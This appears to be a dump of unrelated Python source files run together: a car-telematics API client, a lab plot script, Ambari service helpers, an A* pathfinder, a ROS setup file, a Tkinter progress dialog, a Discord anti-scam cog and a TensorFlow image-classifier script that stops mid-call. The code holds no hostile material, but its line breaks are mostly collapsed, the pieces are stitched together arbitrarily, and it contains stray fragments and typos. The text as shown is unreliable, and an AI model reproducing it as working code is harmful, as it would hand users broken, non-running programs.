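        # Flatten the nested "climate" section into the top-level vehicleStatus keys
        # (airCtrlOn, defrost, sideBackWindowHeat, sideMirrorHeat, steerWheelHeat,
        # airTemp) that update_vehicle_with_cached_state reads back via get_child_value.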
climate_data = vehicle_status["climate"] vehicle_status["airCtrlOn"] = climate_data["airCtrl"] vehicle_status["defrost"] = climate_data["defrost"] vehicle_status["sideBackWindowHeat"] = climate_data["heatingAccessory"][ "rearWindow" ] vehicle_status["sideMirrorHeat"] = climate_data["heatingAccessory"][ "sideMirror" ] vehicle_status["steerWheelHeat"] = climate_data["heatingAccessory"][ "steeringWheel" ] vehicle_status["airTemp"] = climate_data["airTemp"] return vehicle_data def get_location(self, token: Token, vehicle_id: str) -> None: pass def force_refresh_vehicle_state(self, token: Token, vehicle: Vehicle) -> None: url = self.API_URL + "rems/rvs" body = { "requestType": 0 # value of 1 would return cached results instead of forcing update } self.post_request_with_logging_and_active_session( token=token, url=url, json_body=body, vehicle=vehicle ) def check_last_action_status(self, token: Token, vehicle: Vehicle, action_id: str): url = self.API_URL + "cmm/gts" body = {"xid": action_id} response = self.post_request_with_logging_and_active_session( token=token, url=url, json_body=body, vehicle=vehicle ) response_json = response.json() last_action_completed = all( v == 0 for v in response_json["payload"].values() ) return last_action_completed def lock_action(self, token: Token, vehicle: Vehicle, action) -> str: _LOGGER.debug(f"Action for lock is: {action}") if action == VEHICLE_LOCK_ACTION.LOCK: url = self.API_URL + "rems/door/lock" _LOGGER.debug(f"Calling Lock") elif action == VEHICLE_LOCK_ACTION.UNLOCK: url = self.API_URL + "rems/door/unlock" _LOGGER.debug(f"Calling unlock") response = self.get_request_with_logging_and_active_session( token=token, url=url, vehicle=vehicle ) return response.headers["Xid"] def start_climate( self, token: Token, vehicle: Vehicle, options: ClimateRequestOptions ) -> str: url = self.API_URL + "rems/start" if options.set_temp < 62: options.set_temp = "LOW" elif options.set_temp > 82: options.set_temp = "HIGH" body = { "remoteClimate": { "airCtrl": options.climate, "airTemp": { "unit": 1, "value": str(options.set_temp), }, "defrost": options.defrost, "heatingAccessory": { "rearWindow": int(options.heating), "sideMirror": int(options.heating), "steeringWheel": int(options.heating), }, "ignitionOnDuration": { "unit": 4, "value": options.duration, }, } } response = self.post_request_with_logging_and_active_session( token=token, url=url, json_body=body, vehicle=vehicle ) return response.headers["Xid"] def stop_climate(self, token: Token, vehicle: Vehicle)-> str: url = self.API_URL + "rems/stop" response = self.get_request_with_logging_and_active_session( token=token, url=url ) return response.headers["Xid"] def start_charge(self, token: Token, vehicle: Vehicle)-> str: url = self.API_URL + "evc/charge" body = {"chargeRatio": 100} response = self.post_request_with_logging_and_active_session( token=token, url=url, json_body=body ) return response.headers["Xid"] def stop_charge(self, token: Token, vehicle: Vehicle)-> str: url = self.API_URL + "evc/cancel" response = self.get_request_with_logging_and_active_session( token=token, url=url, vehicle=vehicle ) return response.headers["Xid"] def set_charge_limits(self, token: Token, vehicle: Vehicle, ac_limit: int, dc_limit: int)-> str: url = self.API_URL + "evc/sts" body = { "targetSOClist": [ { "plugType": 0, "targetSOClevel": dc_limit, }, { "plugType": 1, "targetSOClevel": ac_limit, }, ] } response = self.post_request_with_logging_and_active_session( token=token, url=url, json_body=body, vechile=vehicle ) return 
response.headers["Xid"] chaserhkj/ModPhyLabJosephson_effect/vt2.py10-100 from matplotlib import pyplot as plt x = [] y = [] with open('data3.txt') as f: line = f.readline() while line: x.append(float(line.split(',')[0])) y.append(float(line.split(',')[1])) line = f.readline() y = [i/50 for i in y] plt.xlabel("I/mA") plt.ylabel("U/$\mu$V") plt.plot(x, y) plt.savefig("vt2.pdf") plt.show() Syndra/Ambari-source1-10 #!/usr/bin/env python """ Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import os, pwd, grp from resource_management.core.resources.system import Execute, File from resource_management.core.logger import Logger from resource_management.libraries.functions.format import format from resource_management.libraries.functions.get_user_call_output import get_user_call_output from resource_management.libraries.functions.show_logs import show_logs #from resource_management.libraries.resources.hdfs_resource import HdfsResource from ambari_commons.constants import AMBARI_SUDO_BINARY def package_dir(): return os.path.realpath(__file__).split('/package')[0] + '/package/' def create_linux_user(user, group): sudo = AMBARI_SUDO_BINARY try: pwd.getpwnam(user) except KeyError: Execute(format("{sudo} useradd ") + user, logoutput=True) try: grp.getgrnam(group) except KeyError: Execute(format("{sudo} groupadd ") + group, logoutput=True) def create_hdfs_dirs(user, group, dirs): import jnbg_params as params for dir, perms in dirs: params.HdfsResource(dir, type = "directory", action = "create_on_execute", owner = user, group = group, mode = int(perms, 8) ) params.HdfsResource(None, action="execute") def stop_process(pid_file, user, log_dir): """ Kill the process by pid file, then check the process is running or not. If the process is still running after the kill command, try to kill with -9 option (hard kill) """ sudo = AMBARI_SUDO_BINARY pid = get_user_call_output(format("cat {pid_file}"), user=user, is_checked_call=False)[1] process_id_exists_command = format("ls {pid_file} >/dev/null 2>&1 && ps -p {pid} >/dev/null 2>&1") kill_cmd = format("{sudo} kill {pid}") Execute(kill_cmd, not_if=format("! ({process_id_exists_command})")) wait_time = 5 hard_kill_cmd = format("{sudo} kill -9 {pid}") Execute(hard_kill_cmd, not_if=format("! ({process_id_exists_command}) || ( sleep {wait_time} && ! ({process_id_exists_command}) )"), ignore_failures = True) try: Execute(format("! 
({process_id_exists_command})"), tries=20, try_sleep=3) except: show_logs(log_dir, user) raise File(pid_file, action="delete") import heapq STATUS_NO = 0 STATUS_OPEN = 1 STATUS_CLOSE = 2 DIR_8_LIST = [ [1,-1], [1, 0], [1, 1], [0,-1], [0, 1], [-1,-1], [-1,0,], [-1,1], ] DIR_4_LIST = [ [-1,0], [1, 0], [0,-1], [0, 1], ] COLOR_DESC = { 'black':30, 'red':31, 'yellow':33, 'blue':34, 'green':32, 'purple':35, 'cyan':36, 'white':37, } def color_pack(s, color): return "\033[%dm%s\033[0m"%(COLOR_DESC.get(color,37),s) class CNode: def __init__(self, row, col): self.m_Row = row self.m_Col = col self.m_Mark = '.' self.m_Status = STATUS_NO self.m_Parent = None self.m_gScore = 0 self.m_fScore = 0 def restore(self): self.m_Status = STATUS_NO self.m_Parent = None self.m_gScore = 0 self.m_fScore = 0 def is_goalnode(self): return self.m_Mark == 'g' def is_startnode(self): return self.m_Mark == 's' def is_open(self): return self.m_Status == STATUS_OPEN def is_close(self): return self.m_Status == STATUS_CLOSE class CMap: def __init__(self, map_list): self.m_StartPos = None self.m_GoalPos = None self.m_MaxCol = len(map_list[0]) self.m_MaxRow = len(map_list) self.m_NodesList = [[None]*self.m_MaxCol for i in range(self.m_MaxRow)] for i in xrange(self.m_MaxRow): for j in xrange(self.m_MaxCol): mark = map_list[i][j] if mark != '1': self.m_NodesList[i][j] = CNode(i,j) print color_pack("init map[%dx%d] ok!"%(self.m_MaxRow,self.m_MaxCol), "yellow") def set_config(self, stapos, goalpos, diagonal_able=False, max_depth=None): last_sta_node = self.get_start_node() if last_sta_node: last_sta_node.m_Mark = '.' self.m_StartPos = stapos start_node = self.get_start_node() start_node.m_Mark = 's' last_goal_node = self.get_goal_node() if last_goal_node: last_goal_node.m_Mark = '.' self.m_GoalPos = goalpos goal_node = self.get_goal_node() goal_node.m_Mark = 'g' if max_depth: self.m_MaxDepth = max_depth else: self.m_MaxDepth = self.m_MaxCol*self.m_MaxRow self.m_DiagonalAble = diagonal_able def get_start_node(self): if self.m_StartPos: sr,sc = self.m_StartPos return self.m_NodesList[sr][sc] def get_goal_node(self): if self.m_GoalPos: gr,gc = self.m_GoalPos return self.m_NodesList[gr][gc] def is_block(self, r, c): if (0<=r 1): return parent.m_gScore + 14 else: return parent.m_gScore + 10 return 0 def compute_h(self, node): gr,gc = self.m_GoalPos dr = abs(node.m_Row - gr) dc = abs(node.m_Col - gc) if self.m_DiagonalAble: if dr > dc: # 1:1:sqrt(2) return (dr-dc)*10 + 14*dc else: return (dc-dr)*10 + 14*dr else: return 10*(dr+dc) def add_open(self, node, parent=None): self.m_CurDepth = self.m_CurDepth + 1 node.m_Status = STATUS_OPEN node.m_Parent = parent node.m_gScore = self.compute_g(node, parent) node.m_hScore = self.compute_h(node) node.m_fScore = node.m_gScore + node.m_hScore heapq.heappush(self.m_OpenList, (node.m_fScore,node)) if self.m_CurDepth >= self.m_MaxDepth: goal_node = self.get_goal_node() if not goal_node in self.m_OpenList: return True def add_close(self, node): node.m_Status = STATUS_CLOSE self.m_CloseList.append(node) def find_path(self): #A* pathfinding self.m_OpenList = [] self.m_CloseList = [] self.m_CurDepth = 0 dir_list = None if self.m_DiagonalAble: dir_list = DIR_8_LIST else: dir_list = DIR_4_LIST for i in xrange(self.m_MaxRow): for j in xrange(self.m_MaxCol): if self.m_NodesList[i][j] != None: self.m_NodesList[i][j].restore() start_node = self.get_start_node() self.add_open(start_node) while len(self.m_OpenList) > 0: current = heapq.heappop(self.m_OpenList)[1] if current.is_goalnode(): 
self.reconstruct_path(current) return self.add_close(current) for d in dir_list: nr = d[0] + current.m_Row nc = d[1] + current.m_Col if self.is_block(nr, nc): continue neighbor = self.m_NodesList[nr][nc] if neighbor.is_close(): continue if neighbor.is_open(): tentative_gscore = self.compute_g(neighbor, current) if tentative_gscore < neighbor.m_gScore: neighbor.m_Parent = current neighbor.m_gScore = tentative_gscore neighbor.m_fScore = tentative_gscore + neighbor.m_hScore else: if self.m_CurDepth < self.m_MaxDepth: if self.add_open(neighbor, current): lastnode = self.m_CloseList[-1] self.reconstruct_path(lastnode) return self.reconstruct_path(None) def reconstruct_path(self, lastnode): map_list = [[color_pack('0','green')]*self.m_MaxCol for i in range(self.m_MaxRow)] for i in xrange(self.m_MaxRow): for j in xrange(self.m_MaxCol): if self.m_NodesList[i][j] != None: if self.m_NodesList[i][j].is_startnode(): map_list[i][j] = color_pack('s','blue') elif self.m_NodesList[i][j].is_goalnode(): map_list[i][j] = color_pack('g','yellow') else: map_list[i][j] = color_pack('1','red') msg = "%d dir search cost depth:%d limit depth:%d "%(8 if self.m_DiagonalAble else 4, self.m_CurDepth, self.m_MaxDepth) if lastnode == None: msg = msg + color_pack("result:can,t access[failed]", "black") else: current = lastnode if lastnode.is_goalnode(): msg = msg + color_pack("result:get it[succeed]", "blue") else: msg = msg + color_pack("result:depth limit[failed]", "cyan") while current: if not current.is_startnode() and not current.is_goalnode(): map_list[current.m_Row][current.m_Col] = color_pack("*",'green') current = current.m_Parent print msg for v in map_list: print " ".join(v) map_data = [ "1....1111", "..1111...", "1...111.1", "...1...1.", "...11....", "1..1.1111", "1....1..1", ] pf = CMap(map_data) #4 dir search pf.set_config((1,1),(5,4)) pf.find_path() #8 dir search pf.set_config((1,1),(1,6), True) pf.find_path() #depth limit search pf.set_config((1,1),(1,6), True, 20) pf.find_path() #cant access pf.set_config((1,1),(1,6)) pf.find_path() pf.set_config((1,1),(6,6),True) pf.find_path()1-10 def repro(): return kscottz/owi_armsetup.py0 ## ! DO NOT MANUALLY INVOKE THIS setup.py, USE CATKIN INSTEAD from distutils.core import setup from catkin_pkg.python_setup import generate_distutils_setup # fetch values from package.xml setup_args = generate_distutils_setup( packages=['owi_arm'], package_dir={'': 'src'}, requires=['rospy',"std_msgs", "sensor_msgs", './scripts/cmd_robot.py','./scripts/owi_joystick_node.py','./scripts/toy_joint_states.py','./scripts/arm_controller.py'] ) setup(**setup_args) flipper/application/progress.py import flipper import flipper.application from flipper.application.spinning_icon import SPINNING_ICON from multiprocessing import JoinableQueue as Queue from multiprocessing import Process from queue import Empty import tkinter as TK # Note: Because of how memory is managed in Python the _worker_thread # works with a copy of the main memory. Therefore any changes it makes to the # objects involved, such as caching results, will NOT be done to the origional # objects. Hence all such changes will be lost when the thread completes. def _worker_thread(function, args, answer): try: result = function(*args) answer.put(result) except Exception as error: answer.put(error) # Return any errors that occur. 
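# A minimal, hypothetical sketch (not part of flipper) of the caveat noted above
# _worker_thread: the worker runs in a separate process with its own copy of the
# parent's memory, so the return value has to travel back through the queue,
# while any side effect made in the child, here filling the _CACHE dict, is lost
# when the process exits. _CACHE and _expensive are made-up names for this
# example; Queue and Process are the multiprocessing imports already used above.

_CACHE = {}

def _expensive(n):
    # Memoise on a module-level dict; when run in the worker process this only
    # fills the child's copy of _CACHE, never the parent's.
    if n not in _CACHE:
        _CACHE[n] = sum(i * i for i in range(n))
    return _CACHE[n]

if __name__ == '__main__':
    _answer = Queue()
    _worker = Process(target=_worker_thread, args=(_expensive, (10 ** 5,), _answer))
    _worker.start()
    print(_answer.get())  # the value computed in the child arrives via the queue
    _worker.join()
    print(_CACHE)         # prints {}: the cache filled in the child never reached the parent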
class ProgressApp: def __init__(self, host_app_parent=None): if host_app_parent is None: host_app_parent = TK._default_root self.host_app_parent = host_app_parent self.parent = TK.Toplevel(self.host_app_parent) self.parent.withdraw() # Hide self while we set up the geometry. self.parent.title('flipper: Computing...') self.parent.protocol('WM_DELETE_WINDOW', self.cancel) # To catch when users click the 'x' to close the window. self.progress = flipper.application.AnimatedCanvas(self.parent, frames_contents=SPINNING_ICON) self.progress.pack(padx=130, pady=5) self.button_cancel = TK.Button(self.parent, text='Cancel', command=self.cancel) self.button_cancel.pack(padx=5, pady=5, side='right') self.running = False self.worker = None self.parent.resizable(0, 0) self.parent.withdraw() self.parent.lift() self.button_cancel.focus() self.parent.update_idletasks() x = self.host_app_parent.winfo_rootx() + self.host_app_parent.winfo_width() // 2 - self.parent.winfo_width() // 2 y = self.host_app_parent.winfo_rooty() + self.host_app_parent.winfo_height() // 2 - self.parent.winfo_height() // 2 self.parent.update_idletasks() self.parent.geometry('+%d+%d' % (x, y)) self.parent.deiconify() self.parent.transient(self.host_app_parent) # Lock this window on top. self.parent.grab_set() # Make sure this window always has focus. self.parent.update_idletasks() def cancel(self): if self.running: self.running = False self.worker.terminate() self.host_app_parent.focus_set() self.parent.destroy() def apply(self, function, args=None): if args is None: args = [] answer = Queue() self.worker = Process(target=_worker_thread, args=(function, args, answer)) self.worker.deamon = True # Making the worker a deamon of this thread stops it if the main thread is killed. self.running = True self.worker.start() while self.running: # So long as the calculation hasn't been aborted. try: result = answer.get(True, 0.05) # Try and get some more information. except Empty: self.host_app_parent.update() else: self.cancel() if isinstance(result, Exception): raise result else: return result # If we reach this point then the calculation was aborted. 
raise flipper.AbortError def apply_progression(function, args=None, host_app_parent=None): return ProgressApp(host_app_parent).apply(function, args) from django.apps import AppConfig class IchingdbConfig(AppConfig): name = 'ichingdb' 0 import copy import discord from discord.ext import commands from libs.classes import Zbot, MyContext from libs.antiscam import AntiScamAgent, Message from fcts import checks def is_immune(member: discord.Member) -> bool: "Check if a member is immune to the anti-scam feature" return (member.bot or member.guild_permissions.administrator or member.guild_permissions.manage_messages or member.guild_permissions.manage_guild) class AntiScam(commands.Cog): "Anti scam feature which read every message and detect if they are malicious" def __init__(self, bot: Zbot): self.bot = bot self.file = "antiscam" self.agent = AntiScamAgent() async def send_bot_log(self, msg: discord.Message): "Send a log to the bot internal log channel" emb = discord.Embed(title="Scam message deleted", description=msg.content, color=discord.Color.red()) emb.set_author(name=msg.author, icon_url=msg.author.display_avatar) emb.set_footer(text=f"{msg.guild.name} ({msg.guild.id})" if msg.guild else "No guild") await self.bot.send_embed([emb]) @commands.group(name="antiscam") async def antiscam(self, ctx: MyContext): """Everything related to the antiscam feature ..Doc moderator.html#anti-scam""" @antiscam.command(name="test") @commands.cooldown(5, 30, commands.BucketType.user) async def antiscam_test(self, ctx: MyContext, *, msg: str): """Test the antiscam feature with a given message ..Example antiscam test free nitro for everyone at bit.ly/tomato""" data = Message.from_raw(msg, 0) pred = self.agent.predict_bot(data) await ctx.send(pred.to_string(self.agent.categories) + f"\nURL risk score: {data.url_score}") @antiscam.command(name="enable") @commands.guild_only() @commands.check(checks.has_manage_guild) async def antiscam_enable(self, ctx: MyContext): """Enable the anti scam feature in your server ..Doc moderator.html#anti-scam""" msg: discord.Message = copy.copy(ctx.message) msg.content = f'{ctx.prefix}config change anti_scam true' new_ctx = await self.bot.get_context(msg) await self.bot.invoke(new_ctx) @antiscam.command(name="disable") @commands.guild_only() @commands.check(checks.has_manage_guild) async def antiscam_disable(self, ctx: MyContext): """Disable the anti scam feature in your server ..Doc moderator.html#anti-scam""" msg: discord.Message = copy.copy(ctx.message) msg.content = f'{ctx.prefix}config change anti_scam false' new_ctx = await self.bot.get_context(msg) await self.bot.invoke(new_ctx) @commands.Cog.listener() async def on_message(self, msg: discord.Message): "Check any message for scam dangerousity" if not msg.guild or len(msg.content) < 10 or is_immune(msg.author) or await self.bot.potential_command(msg): return await self.bot.wait_until_ready() if not await self.bot.get_config(msg.guild.id, "anti_scam"): return message: Message = Message.from_raw(msg.content, len(msg.mentions)) if len(message.normd_message) < 3: return result = self.agent.predict_bot(message) if result.result > 1: message.category = 0 print("GOT", message.message, result.probabilities[2]) if result.probabilities[1] < 0.005: # if probability of not being harmless is less than 0.5% try: await msg.delete() # try to delete it, silently fails except discord.Forbidden: pass await self.send_bot_log(msg) self.bot.dispatch("antiscam_delete", msg, result) # msg_id = await bot.insert_msg(message) # await 
bot.send_report(msg, msg_id, message) elif result.probabilities[1] < 0.3: self.bot.dispatch("antiscam_warn", msg, result) async def setup(bot): await bot.add_cog(AntiScam(bot)) 1-10 #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Wed Jun 14 16:15:18 2017 @authors: lwk, RH """ import matplotlib matplotlib.use('Agg') import os import sys import numpy as np import tensorflow as tf import HE_data_input import cnnm import cnng import cnni import cnnt import cnnir1 import cnnir2 import cnnva import cnnv16 import cnnv19 import pandas as pd import sklearn as skl import matplotlib.pyplot as plt from PIL import Image import cv2 import Sample_prep dirr = sys.argv[1] bs = sys.argv[2] iter = sys.argv[3] md = sys.argv[4] bs = int(bs) iter = int(iter) IMG_DIM = 299 INPUT_DIM = [IMG_DIM ** 2 * 3, IMG_DIM, IMG_DIM] HYPERPARAMS = { "batch_size": bs, "dropout": 0.8, "learning_rate": 1E-4 } MAX_ITER = iter MAX_EPOCHS = np.inf img_dir = '../Neutrophil/All_Tiles_final' LOG_DIR = "../Neutrophil/{}".format(dirr) METAGRAPH_DIR = "../Neutrophil/{}".format(dirr) data_dir = "../Neutrophil/{}/data".format(dirr) out_dir = "../Neutrophil/{}/out".format(dirr) def counters(totlist_dir): trlist = pd.read_csv(totlist_dir + '/tr_sample.csv', header=0) telist = pd.read_csv(totlist_dir + '/te_sample.csv', header=0) trcc = len(trlist['label']) - 1 tecc = len(telist['label']) - 1 trnumm = int(trcc/5000)+1 tenumm = int(tecc/5000)+1 return trcc, tecc, trnumm, tenumm def loader(totlist_dir): dat = np.empty((0, int(299 ** 2 * 3)), dtype='uint8') tile_lab = [] trlist = pd.read_csv(totlist_dir+'/tr_sample.csv', header=0) telist = pd.read_csv(totlist_dir+'/te_sample.csv', header=0) f = 1 for index, row in trlist.iterrows(): image = Image.open(row['path']) pix = np.array(image)[:, :, 0:3] dat = np.vstack([dat, pix.flatten()]) tile_lab.append(row['label']) if len(tile_lab) == 5000 or index == len(trlist['label']) - 1: np.savetxt(data_dir + '/data_{}.txt'.format(f), dat, fmt='%i', delimiter='\t') np.savetxt(data_dir + '/lab_{}.txt'.format(f), tile_lab, fmt='%i', delimiter='\t') dat = np.empty((0, int(299 ** 2 * 3)), dtype='uint8') tile_lab = [] f += 1 dat = np.empty((0, int(299 ** 2 * 3)), dtype='uint8') tile_lab = [] g = 1 for index, row in telist.iterrows(): image = Image.open(row['path']) pix = np.array(image)[:, :, 0:3] dat = np.vstack([dat, pix.flatten()]) tile_lab.append(row['label']) if len(tile_lab) == 5000 or index == len(telist['label']) - 1: np.savetxt(data_dir + '/data_test_{}.txt'.format(g), dat, fmt='%i', delimiter='\t') np.savetxt(data_dir + '/lab_test_{}.txt'.format(g), tile_lab, fmt='%i', delimiter='\t') dat = np.empty((0, int(299 ** 2 * 3)), dtype='uint8') tile_lab = [] g += 1 # to_load = def iter_loadtxt(filename, delimiter=',', skiprows=0, dtype=float): def iter_func(): with open(filename, 'r') as infile: for _ in range(skiprows): next(infile) for line in infile: line = line.rstrip().split(delimiter) for item in line: yield dtype(item) iter_loadtxt.rowlength = len(line) data = np.fromiter(iter_func(), dtype=dtype) data = data.reshape((-1, iter_loadtxt.rowlength)) return data def load_HE_data(train_dat_name, train_lab_name, valid_dat_name, valid_lab_name): train_dat = iter_loadtxt(train_dat_name, dtype=int, delimiter='\t') valid_dat = iter_loadtxt(valid_dat_name, dtype=int, delimiter='\t') train_lab = iter_loadtxt(train_lab_name, dtype=int, delimiter='\t') valid_lab = iter_loadtxt(valid_lab_name, dtype=int, delimiter='\t') size = train_lab.shape[0] class DataSets(object): pass data_sets = DataSets() 
data_sets.train = HE_data_input.DataSet(images=train_dat, labels=train_lab, reshape=False) data_sets.validation = HE_data_input.DataSet(images=valid_dat, labels=valid_lab, reshape=False) return data_sets, size def metrics(pdx, tl, path, name): pdx = np.asmatrix(pdx) prl = (pdx[:,1] > 0.5).astype('uint8') prl = pd.DataFrame(prl, columns = ['Prediction']) out = pd.DataFrame(pdx, columns = ['neg_score', 'pos_score']) outtl = pd.DataFrame(tl, columns = ['True_label']) out = pd.concat([out,prl,outtl], axis=1) out.to_csv("../Neutrophil/{}/out/{}.csv".format(path, name), index=False) accu = 0 tott = out.shape[0] for idx, row in out.iterrows(): if row['Prediction'] == row['True_label']: accu += 1 accur = accu/tott accur = round(accur,2) print('Accuracy:') print(accur) y_score = pdx[:,1] auc = skl.metrics.roc_auc_score(tl, y_score) print('ROC-AUC:') print(skl.metrics.roc_auc_score(tl, y_score)) fpr, tpr, _ = skl.metrics.roc_curve(tl, y_score) plt.figure() lw = 2 plt.plot(fpr, tpr, color='darkorange', lw=lw, label='ROC curve (area = %0.2f)' % auc) plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--') plt.xlim([0.0, 1.0]) plt.ylim([0.0, 1.05]) plt.xlabel('False Positive Rate') plt.ylabel('True Positive Rate') plt.title('ROC of {}'.format(name)) plt.legend(loc="lower right") plt.savefig("../Neutrophil/{}/out/{}_ROC.png".format(path, name)) average_precision = skl.metrics.average_precision_score(tl, y_score) print('Average precision-recall score: {0:0.2f}'.format(average_precision)) plt.figure() precision, recall, _ = skl.metrics.precision_recall_curve(tl, y_score) plt.step(recall, precision, color='b', alpha=0.2, where='post') plt.fill_between(recall, precision, step='post', alpha=0.2, color='b') plt.xlabel('Recall') plt.ylabel('Precision') plt.ylim([0.0, 1.05]) plt.xlim([0.0, 1.0]) plt.title('{} Precision-Recall curve: AP={:0.2f}; Accu={}'.format(name, average_precision, accur)) plt.savefig("../Neutrophil/{}/out/{}_PRC.png".format(path, name)) def py_returnCAMmap(activation, weights_LR): n_feat, w, h, n = activation.shape act_vec = np.reshape(activation, [n_feat, w*h]) n_top = weights_LR.shape[0] out = np.zeros([w, h, n_top]) for t in range(n_top): weights_vec = np.reshape(weights_LR[t], [1, weights_LR[t].shape[0]]) heatmap_vec = np.dot(weights_vec,act_vec) heatmap = np.reshape( np.squeeze(heatmap_vec) , [w, h]) out[:,:,t] = heatmap return out def im2double(im): return cv2.normalize(im.astype('float'), None, 0.0, 1.0, cv2.NORM_MINMAX) def py_map2jpg(imgmap, rang, colorMap): if rang is None: rang = [np.min(imgmap), np.max(imgmap)] heatmap_x = np.round(imgmap*255).astype(np.uint8) return cv2.applyColorMap(heatmap_x, cv2.COLORMAP_JET) def CAM(net, w, pred, x, y, path, name): DIR = "../Neutrophil/{}/out/{}_posimg".format(path, name) DIRR = "../Neutrophil/{}/out/{}_negimg".format(path, name) try: os.mkdir(DIR) except(FileExistsError): pass try: os.mkdir(DIRR) except(FileExistsError): pass pdx = np.asmatrix(pred) prl = (pdx[:,1] > 0.5).astype('uint8') for ij in range(len(y)): if prl[ij] == 0: if y[ij] == 0: ddt = 'Correct' else: ddt = 'Wrong' weights_LR = w activation_lastconv = np.array([net[ij]]) weights_LR = weights_LR.T activation_lastconv = activation_lastconv.T topNum = 1 # generate heatmap for top X prediction results scores = pred[ij] scoresMean = np.mean(scores, axis=0) ascending_order = np.argsort(scoresMean) IDX_category = ascending_order[::-1] # [::-1] to sort in descending order curCAMmapAll = py_returnCAMmap(activation_lastconv, weights_LR[[0], :]) for kk in range(topNum): 
curCAMmap_crops = curCAMmapAll[:, :, kk] curCAMmapLarge_crops = cv2.resize(curCAMmap_crops, (299, 299)) curHeatMap = cv2.resize(im2double(curCAMmapLarge_crops), (299, 299)) # this line is not doing much curHeatMap = im2double(curHeatMap) curHeatMap = py_map2jpg(curHeatMap, None, 'jet') xim = x[ij].reshape(-1, 3) xim1 = xim[:, 0].reshape(-1, 299) xim2 = xim[:, 1].reshape(-1, 299) xim3 = xim[:, 2].reshape(-1, 299) image = np.empty([299,299,3]) image[:, :, 0] = xim1 image[:, :, 1] = xim2 image[:, :, 2] = xim3 a = im2double(image) * 255 b = im2double(curHeatMap) * 255 curHeatMap = a * 0.6 + b * 0.4 ab = np.hstack((a,b)) full = np.hstack((curHeatMap, ab)) # imname = DIRR + '/' + ddt + str(ij) + '.png' # imname1 = DIRR + '/' + ddt + str(ij) + '_img.png' # imname2 = DIRR+ '/' + ddt + str(ij) + '_hm.png' imname3 = DIRR + '/' + ddt + str(ij) + '_full.png' # cv2.imwrite(imname, curHeatMap) # cv2.imwrite(imname1, a) # cv2.imwrite(imname2, b) cv2.imwrite(imname3, full) else: if y[ij] == 1: ddt = 'Correct' else: ddt = 'Wrong' weights_LR = w activation_lastconv = np.array([net[ij]]) weights_LR = weights_LR.T activation_lastconv = activation_lastconv.T topNum = 1 # generate heatmap for top X prediction results scores = pred[ij] scoresMean = np.mean(scores, axis=0) ascending_order = np.argsort(scoresMean) IDX_category = ascending_order[::-1] # [::-1] to sort in descending order curCAMmapAll = py_returnCAMmap(activation_lastconv, weights_LR[[1], :]) for kk in range(topNum): curCAMmap_crops = curCAMmapAll[:, :, kk] curCAMmapLarge_crops = cv2.resize(curCAMmap_crops, (299, 299)) curHeatMap = cv2.resize(im2double(curCAMmapLarge_crops), (299, 299)) # this line is not doing much curHeatMap = im2double(curHeatMap) curHeatMap = py_map2jpg(curHeatMap, None, 'jet') xim = x[ij].reshape(-1, 3) xim1 = xim[:, 0].reshape(-1, 299) xim2 = xim[:, 1].reshape(-1, 299) xim3 = xim[:, 2].reshape(-1, 299) image = np.empty([299,299,3]) image[:, :, 0] = xim1 image[:, :, 1] = xim2 image[:, :, 2] = xim3 a = im2double(image) * 255 b = im2double(curHeatMap) * 255 curHeatMap = a * 0.6 + b * 0.4 ab = np.hstack((a,b)) full = np.hstack((curHeatMap, ab)) # imname = DIR + '/' + ddt + str(ij) + '.png' # imname1 = DIR + '/' + ddt + str(ij) + '_img.png' # imname2 = DIR + '/' + ddt + str(ij) + '_hm.png' imname3 = DIR + '/' + ddt + str(ij) + '_full.png' # cv2.imwrite(imname, curHeatMap) # cv2.imwrite(imname1, a) # cv2.imwrite(imname2, b) cv2.imwrite(imname3, full) def main(tenum, trnum, trc, tec, reITER=None, old_ITER=None, to_reload=None, test=None, log_dir=None): if test: # restore if md == 'IG': m = cnng.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'I2': m = cnnt.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'I3': m = cnnm.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'I4': m = cnni.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'IR1': m = cnnir1.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'IR2': m = cnnir2.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'VA': m = cnnva.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'V16': m = cnnv16.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'V19': m = cnnv19.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) else: m = cnng.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, 
